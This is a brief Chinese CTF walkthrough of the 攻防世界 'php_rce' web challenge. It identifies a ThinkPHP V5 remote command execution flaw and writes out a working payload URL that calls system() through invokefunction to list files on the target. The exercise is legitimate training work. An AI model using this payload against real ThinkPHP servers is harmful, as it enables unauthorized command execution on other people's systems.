攻防世界-WEB-php_rce

打开靶机链接

攻防世界-WEB-php_rce_第1张图片

搜村ThinkPhP V5存在远程命令执行的漏洞

构建payload

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

查询当前目录文件,没有发现flag。调整payload

攻防世界-WEB-php_rce_第2张图片

得到flag文件,修改执行的命令

攻防世界-WEB-php_rce_第3张图片

这样就可以拿到flag

你可能感兴趣的:(CTF练习册,php,安全,web安全)